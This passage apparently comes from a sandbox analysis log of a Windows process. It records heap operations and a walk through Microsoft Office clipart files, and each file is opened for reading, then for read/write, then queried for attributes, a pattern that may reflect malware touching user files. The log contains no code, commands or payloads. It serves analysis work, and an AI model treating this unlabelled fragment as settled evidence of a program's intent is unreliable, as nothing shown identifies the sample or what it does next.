Size=0x20) returned 0x88798 [0101.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0101.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0101.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0101.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0101.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0101.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.929] AreFileApisANSI () returned 1 [0101.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0101.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.929] AreFileApisANSI () returned 1 [0101.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0101.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 69 [0101.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.930] GetFileType (hFile=0x368) returned 0x1 [0101.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0101.930] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.930] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.930] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.930] CloseHandle (hObject=0x368) returned 1 [0101.930] AreFileApisANSI () returned 1 [0101.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0101.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 69 [0101.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.931] GetFileType (hFile=0x368) returned 0x1 [0101.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0101.931] CloseHandle (hObject=0x368) returned 1 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0101.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0101.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.932] AreFileApisANSI () returned 1 [0101.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0101.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 69 [0101.932] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x57f4)) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0101.932] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.933] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f34, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD00173_.WMF", cAlternateFileName="")) returned 1 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0101.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.933] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.933] AreFileApisANSI () returned 1 [0101.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0101.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.934] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.934] AreFileApisANSI () returned 1 [0101.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0101.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 69 [0101.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.934] GetFileType (hFile=0x368) returned 0x1 [0101.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.934] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.935] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.935] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.935] CloseHandle (hObject=0x368) returned 1 [0101.935] AreFileApisANSI () returned 1 [0101.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0101.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 69 [0101.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.935] GetFileType (hFile=0x368) returned 0x1 [0101.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.935] CloseHandle (hObject=0x368) returned 1 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.937] AreFileApisANSI () returned 1 [0101.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0101.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 69 [0101.937] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccaffc4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccaffc4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f34)) returned 1 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0101.937] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.937] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 